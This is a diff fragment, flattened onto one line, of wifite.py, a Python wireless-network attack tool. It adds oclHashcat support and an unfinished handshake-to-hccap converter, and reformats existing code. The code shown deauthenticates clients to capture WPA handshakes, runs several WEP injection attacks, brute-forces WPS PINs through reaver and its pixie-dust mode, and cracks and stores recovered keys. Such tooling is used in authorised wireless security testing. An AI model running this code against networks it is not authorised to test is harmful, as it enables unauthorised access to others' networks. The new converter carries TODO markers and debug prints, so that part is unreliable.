600' + W - print '' +# def help(): +# """ +# Prints help screen +# """ +# +# head = W +# sw = G +# var = GR +# des = W +# de = G +# +# print head + ' COMMANDS' + W +# print sw + '\t-check ' + var + '\t' + des + 'check capfile ' + var + '' + des + ' for handshakes.' + W +# print sw + '\t-cracked \t' + des + 'display previously-cracked access points' + W +# print sw + '\t-recrack \t' + des + 'allow recracking of previously cracked access points' + W +# print '' +# +# print head + ' GLOBAL' + W +# print sw + '\t-all \t' + des + 'attack all targets. ' + de + '[off]' + W +# #print sw+'\t-pillage \t'+des+'attack all targets in a looping fashion.'+de+'[off]'+W +# print sw + '\t-i ' + var + ' \t' + des + 'wireless interface for capturing ' + de + '[auto]' + W +# print sw + '\t-mon-iface ' + var + ' \t' + des + 'interface in monitor mode for capturing ' + de + '[auto]' + W +# print sw + '\t-mac \t' + des + 'anonymize mac address ' + de + '[off]' + W +# print sw + '\t-c ' + var + '\t' + des + 'channel to scan for targets ' + de + '[auto]' + W +# print sw + '\t-e ' + var + ' \t' + des + 'target a specific access point by ssid (name) ' + de + '[ask]' + W +# print sw + '\t-b ' + var + ' \t' + des + 'target a specific access point by bssid (mac) ' + de + '[auto]' + W +# print sw + '\t-showb \t' + des + 'display target BSSIDs after scan ' + de + '[off]' + W +# print sw + '\t-pow ' + var + ' \t' + des + 'attacks any targets with signal strenghth > ' + var + 'db ' + de + '[0]' + W +# print sw + '\t-quiet \t' + des + 'do not print list of APs during scan ' + de + '[off]' + W +# print '' +# +# print head + '\n WPA' + W +# print sw + '\t-wpa \t' + des + 'only target WPA networks (works with -wps -wep) ' + de + '[off]' + W +# print sw + '\t-wpat ' + var + ' \t' + des + 'time to wait for WPA attack to complete (seconds) ' + de + '[500]' + W +# print sw + '\t-wpadt ' + var + ' \t' + des + 'time to wait between sending deauth packets (sec) ' + de + '[10]' + W +# print sw + '\t-strip \t' + des + 'strip handshake using tshark or pyrit ' + de + '[off]' + W +# print sw + '\t-crack ' + var + '\t' + des + 'crack WPA handshakes using ' + var + '' + des + ' wordlist file ' + de + '[off]' + W +# print sw + '\t-dict ' + var + '\t' + des + 'specify dictionary to use when cracking WPA ' + de + '[phpbb.txt]' + W +# print sw + '\t-aircrack \t' + des + 'verify handshake using aircrack ' + de + '[on]' + W +# print sw + '\t-pyrit \t' + des + 'verify handshake using pyrit ' + de + '[off]' + W +# print sw + '\t-tshark \t' + des + 'verify handshake using tshark ' + de + '[on]' + W +# print sw + '\t-cowpatty \t' + des + 'verify handshake using cowpatty ' + de + '[off]' + W +# +# print head + '\n WEP' + W +# print sw + '\t-wep \t' + des + 'only target WEP networks ' + de + '[off]' + W +# print sw + '\t-pps ' + var + ' \t' + des + 'set the number of packets per second to inject ' + de + '[600]' + W +# print sw + '\t-wept ' + var + ' \t' + des + 'sec to wait for each attack, 0 implies endless ' + de + '[600]' + W +# print sw + '\t-chopchop \t' + des + 'use chopchop attack ' + de + '[on]' + W +# print sw + '\t-arpreplay \t' + des + 'use arpreplay attack ' + de + '[on]' + W +# print sw + '\t-fragment \t' + des + 'use fragmentation attack ' + de + '[on]' + W +# print sw + '\t-caffelatte \t' + des + 'use caffe-latte attack ' + de + '[on]' + W +# print sw + '\t-p0841 \t' + des + 'use -p0841 attack ' + de + '[on]' + W +# print sw + '\t-hirte \t' + des + 'use hirte (cfrag) attack ' + de + '[on]' + W +# print sw + '\t-nofakeauth \t' + des + 'stop attack if fake authentication fails ' + de + '[off]' + W +# print sw + '\t-wepca ' + GR + ' \t' + des + 'start cracking when number of ivs surpass n ' + de + '[10000]' + W +# print sw + '\t-wepsave \t' + des + 'save a copy of .cap files to this directory ' + de + '[off]' + W +# +# print head + '\n WPS' + W +# print sw + '\t-wps \t' + des + 'only target WPS networks ' + de + '[off]' + W +# print sw + '\t-wpst ' + var + ' \t' + des + 'max wait for new retry before giving up (0: never) ' + de + '[660]' + W +# print sw + '\t-wpsratio ' + var + '\t' + des + 'min ratio of successful PIN attempts/total tries ' + de + '[0]' + W +# print sw + '\t-wpsretry ' + var + '\t' + des + 'max number of retries for same PIN before giving up ' + de + '[0]' + W +# +# print head + '\n EXAMPLE' + W +# print sw + '\t./wifite.py ' + W + '-wps -wep -c 6 -pps 600' + W +# print '' ########################### @@ -1786,11 +1803,6 @@ def help(): ###################### # SCANNING FUNCTIONS # ###################### - - - - - def wps_check_targets(targets, cap_file, verbose=True): """ Uses reaver's "walsh" (or wash) program to check access points in cap_file @@ -1883,13 +1895,39 @@ def remove_file(filename): os.remove(filename) except OSError: pass + +def arch32or64bits(): + """ + Function returns a string ('32' or '64') with the OS arch + Otherwise stops the program + """ + import platform + + arch = platform.architecture()[0][0:2] + + if (arch != '32' and arch != '64'): + print R + ' [!]' + O + ' No architecture detected' + print GR + " [+]" + W + " quitting" # wifite will now exit" + exit(0) + else: + return arch + def program_exists(program): """ Uses 'which' (linux command) to check if a program is installed. """ - + global HASHCAT_PATH + if (program == 'hashcat'): + arch = arch32or64bits() + if ( not HASHCAT_PATH.endswith("/")): + HASHCAT_PATH += "/" + if not os.path.exists(HASHCAT_PATH + 'oclHashcat'+arch+'.bin'): + return False + else: + return True + proc = Popen(['which', program], stdout=PIPE, stderr=PIPE) txt = proc.communicate() if txt[0].strip() == '' and txt[1].strip() == '': @@ -2134,9 +2172,9 @@ def EndAttack(self): ################# class WPAAttack(Attack): def __init__(self, iface, target, clients, config): - self.iface = iface - self.clients = clients - self.target = target + self.iface = iface + self.clients = clients + self.target = target self.RUN_CONFIG = config def RunAttack(self): @@ -2194,14 +2232,14 @@ def wpa_get_handshake(self): print ' %s starting %swpa handshake capture%s on "%s"' % \ (GR + sec_to_hms(self.RUN_CONFIG.WPA_ATTACK_TIMEOUT) + W, G, W, G + self.target.ssid + W) - got_handshake = False - - seconds_running = 0 + got_handshake = False + + seconds_running = 0 seconds_since_last_deauth = 0 - - target_clients = self.clients[:] - client_index = -1 - start_time = time.time() + + target_clients = self.clients[:] + client_index = -1 + start_time = time.time() # Deauth and check-for-handshake loop while not got_handshake and ( self.RUN_CONFIG.WPA_ATTACK_TIMEOUT <= 0 or seconds_running < self.RUN_CONFIG.WPA_ATTACK_TIMEOUT): @@ -2474,17 +2512,17 @@ def has_handshake_pyrit(self, target, capfile): line.find(', workable, ') != -1): return True return False - + def has_handshake_aircrack(self, target, capfile): """ Uses aircrack-ng to check for handshake. Returns True if found, False otherwise. """ if not program_exists('aircrack-ng'): return False - crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile + crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile proc_crack = Popen(crack, stdout=PIPE, stderr=DN, shell=True) proc_crack.wait() - txt = proc_crack.communicate()[0] + txt = proc_crack.communicate()[0] return (txt.find('Passphrase not in dictionary') != -1) @@ -2556,16 +2594,16 @@ def strip_handshake(self, capfile): def wpa_crack(capfile, RUN_CONFIG): """ Cracks cap file using aircrack-ng - This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat, + This is crude and slow. If people want to crack using pyrit or cowpatty they can do so manually. """ if RUN_CONFIG.WPA_DICTIONARY == '': - print R + ' [!]' + O + ' no WPA dictionary found! use -dict command-line argument' + W + print R + ' [!]' + O + ' no WPA dictionary found! use --dict command-line argument' + W return False print GR + ' [0:00:00]' + W + ' cracking %s with %s' % (G + capfile.ssid + W, G + 'aircrack-ng' + W) start_time = time.time() - cracked = False + cracked = False remove_file(RUN_CONFIG.temp + 'out.out') remove_file(RUN_CONFIG.temp + 'wpakey.txt') @@ -2579,7 +2617,7 @@ def wpa_crack(capfile, RUN_CONFIG): proc = Popen(cmd, stdout=open(RUN_CONFIG.temp + 'out.out', 'a'), stderr=DN) try: - kt = 0 # Keys tested + kt = 0 # Keys tested kps = 0 # Keys per second while True: time.sleep(1) @@ -2602,13 +2640,15 @@ def wpa_crack(capfile, RUN_CONFIG): cracked = True else: # Did not crack + # TODO REMOVE + print cmd print R + '\n [!]' + R + 'crack attempt failed' + O + ': passphrase not in dictionary' + W break - inf = open(RUN_CONFIG.temp + 'out.out', 'r') + inf = open(RUN_CONFIG.temp + 'out.out', 'r') lines = inf.read().split('\n') inf.close() - outf = open(RUN_CONFIG.temp + 'out.out', 'w') + outf = open(RUN_CONFIG.temp + 'out.out', 'w') outf.close() for line in lines: i = line.find(']') @@ -2643,20 +2683,51 @@ def wpa_crack(capfile, RUN_CONFIG): return cracked +def wpa_convert_pcap_to_hccap_format(self, target, capfile): + """ + + """ + if not program_exists('hashcat'): return False + if not program_exists('aircrack-ng'): return False + + # Attempt to convert a cap file to hccap + cmd = ['aircrack-ng', + '--bssid' ,target.bssid, + ' ' , capfile, + '-J' , "wpa-01.hccap"] # TODO!! + #TODO + print cmd + proc = Popen(cmd, stdout=PIPE, stderr=DN) + proc.wait() + hit_essid = False + for line in proc.communicate()[0].split('\n'): + # Iterate over every line of output by aircrack + if line == '' or line == None: continue + if line.find("AccessPoint") != -1: + hit_essid = (line.find("('" + target.ssid + "')") != -1) and \ + (line.lower().find(target.bssid.lower()) != -1) + #hit_essid = (line.lower().find(target.bssid.lower())) + + else: + # If "aircrack-ng -J" says it's good or workable, it's a valid handshake. + if hit_essid and (line.find(', good, ') != -1 or \ + line.find(', workable, ') != -1): + return True + return False def add_commas(n): """ Receives integer n, returns string representation of n with commas in thousands place. I'm sure there's easier ways of doing this... but meh. """ - strn = str(n) - lenn = len(strn) - i = 0 + strn = str(n) + lenn = len(strn) + i = 0 result = '' while i < lenn: if (lenn - i) % 3 == 0 and i != 0: result += ',' result += strn[i] - i += 1 + i += 1 return result @@ -2665,9 +2736,9 @@ def add_commas(n): ################# class WEPAttack(Attack): def __init__(self, iface, target, clients, config): - self.iface = iface - self.target = target - self.clients = clients + self.iface = iface + self.target = target + self.clients = clients self.RUN_CONFIG = config def RunAttack(self): @@ -2714,17 +2785,17 @@ def attack_wep(self): '-c', self.target.channel, # Wireless channel '--bssid', self.target.bssid, self.iface] - proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN) - proc_aireplay = None - proc_aircrack = None - - successful = False # Flag for when attack is successful + proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN) + proc_aireplay = None + proc_aircrack = None + + successful = False # Flag for when attack is successful started_cracking = False # Flag for when we have started aircrack-ng - client_mac = '' # The client mac we will send packets to/from - - total_ivs = 0 - ivs = 0 - last_ivs = 0 + client_mac = '' # The client mac we will send packets to/from + + total_ivs = 0 + ivs = 0 + last_ivs = 0 for attack_num in xrange(0, 6): # Skip disabled attacks @@ -2848,7 +2919,7 @@ def attack_wep(self): 'cracked %s (%s), key: "%s"' % (self.target.ssid, self.target.bssid, key)) self.RUN_CONFIG.WEP_FINDINGS.append('') - t = Target(self.target.bssid, 0, 0, 0, 'WEP', self.target.ssid) + t = Target(self.target.bssid, 0, 0, 0, 'WEP', self.target.ssid) t.key = key self.RUN_CONFIG.save_cracked(t) @@ -2898,7 +2969,7 @@ def attack_wep(self): '-y', xor_file, '-w', self.RUN_CONFIG.temp + 'arp.cap', self.iface] - proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN) + proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN) proc_pforge.wait() forged_packet = proc_pforge.communicate()[0] remove_file(xor_file) @@ -2947,7 +3018,7 @@ def attack_wep(self): 'cracked %s (%s), key: "%s"' % (self.target.ssid, self.target.bssid, key)) self.RUN_CONFIG.WEP_FINDINGS.append('') - t = Target(self.target.bssid, 0, 0, 0, 'WEP', self.target.ssid) + t = Target(self.target.bssid, 0, 0, 0, 'WEP', self.target.ssid) t.key = key self.RUN_CONFIG.save_cracked(t) @@ -3032,15 +3103,15 @@ def attack_wep(self): remove_airodump_files(self.RUN_CONFIG.temp + 'wep') # Need to restart airodump-ng, as it's been interrupted/killed - proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN) - + proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN) + # Say we haven't started cracking yet, so we re-start if needed. started_cracking = False - + # Reset IVs counters for proper behavior - total_ivs += ivs - ivs = 0 - last_ivs = 0 + total_ivs += ivs + ivs = 0 + last_ivs = 0 # Also need to remember to crack "temp/*.cap" instead of just wep-01.cap pass @@ -3067,7 +3138,7 @@ def wep_fake_auth(self, iface, target, time_to_display): Gives 3 seconds to make each 5 authentication attempts. Returns True if authentication was successful, False otherwise. """ - max_wait = 3 # Time, in seconds, to allow each fake authentication + max_wait = 3 # Time, in seconds, to allow each fake authentication max_attempts = 5 # Number of attempts to make for fa_index in xrange(1, max_attempts + 1): @@ -3215,8 +3286,8 @@ def wep_send_deauths(self, iface, target, clients): ################# class WPSAttack(Attack): def __init__(self, iface, target, config): - self.iface = iface - self.target = target + self.iface = iface + self.target = target self.RUN_CONFIG = config def RunAttack(self): @@ -3246,7 +3317,7 @@ def is_pixie_supported(self): ''' Checks if current version of Reaver supports the pixie-dust attack ''' - p = Popen(['reaver', '-h'], stdout=DN, stderr=PIPE) + p = Popen(['reaver', '-h'], stdout=DN, stderr=PIPE) stdout = p.communicate()[1] for line in stdout.split('\n'): if '--pixie-dust' in line: @@ -3274,14 +3345,14 @@ def attack_wps_pixie(self): '-vv'] # verbose output # Redirect stderr to output file - errf = open(self.RUN_CONFIG.temp + 'pixie.out', 'a') + errf = open(self.RUN_CONFIG.temp + 'pixie.out', 'a') # Start process - proc = Popen(cmd, stdout=errf, stderr=errf) - - cracked = False # Flag for when password/pin is found + proc = Popen(cmd, stdout=errf, stderr=errf) + + cracked = False # Flag for when password/pin is found time_started = time.time() - pin = '' - key = '' + pin = '' + key = '' try: while not cracked: @@ -3345,7 +3416,7 @@ def attack_wps_pixie(self): G + self.target.ssid + W, C + key + W, C + pin + W)) self.RUN_CONFIG.WPA_FINDINGS.append('') - t = Target(self.target.bssid, 0, 0, 0, 'WPA', self.target.ssid) + t = Target(self.target.bssid, 0, 0, 0, 'WPA', self.target.ssid) t.key = key t.wps = pin self.RUN_CONFIG.save_cracked(t) @@ -3383,19 +3454,19 @@ def attack_wps(self): '-c', self.target.channel, # '--ignore-locks', '-vv'] # verbose output - proc = Popen(cmd, stdout=DN, stderr=DN) - - cracked = False # Flag for when password/pin is found - percent = 'x.xx%' # Percentage complete - aps = 'x' # Seconds per attempt + proc = Popen(cmd, stdout=DN, stderr=DN) + + cracked = False # Flag for when password/pin is found + percent = 'x.xx%' # Percentage complete + aps = 'x' # Seconds per attempt time_started = time.time() last_success = time_started # Time of last successful attempt - last_pin = '' # Keep track of last pin tried (to detect retries) - retries = 0 # Number of times we have attempted this PIN - tries_total = 0 # Number of times we have attempted all pins - tries = 0 # Number of successful attempts - pin = '' - key = '' + last_pin = '' # Keep track of last pin tried (to detect retries) + retries = 0 # Number of times we have attempted this PIN + tries_total = 0 # Number of times we have attempted all pins + tries = 0 # Number of successful attempts + pin = '' + key = '' try: while not cracked: @@ -3427,8 +3498,8 @@ def attack_wps(self): # Status if line.find(' complete @ ') != -1 and len(line) > 8: percent = line.split(' ')[1] - i = line.find(' (') - j = line.find(' seconds/', i) + i = line.find(' (') + j = line.find(' seconds/', i) if i != -1 and j != -1: aps = line[i + 2:j] # PIN attempt elif line.find(' Trying pin ') != -1: @@ -3436,13 +3507,13 @@ def attack_wps(self): if pin == last_pin: retries += 1 elif tries_total == 0: - last_pin = pin + last_pin = pin tries_total -= 1 else: last_success = time.time() - tries += 1 - last_pin = pin - retries = 0 + tries += 1 + last_pin = pin + retries = 0 tries_total += 1 # Warning @@ -3500,7 +3571,7 @@ def attack_wps(self): G + self.target.ssid + W, C + key + W, C + pin + W)) self.RUN_CONFIG.WPA_FINDINGS.append('') - t = Target(self.target.bssid, 0, 0, 0, 'WPA', self.target.ssid) + t = Target(self.target.bssid, 0, 0, 0, 'WPA', self.target.ssid) t.key = key t.wps = pin self.RUN_CONFIG.save_cracked(t)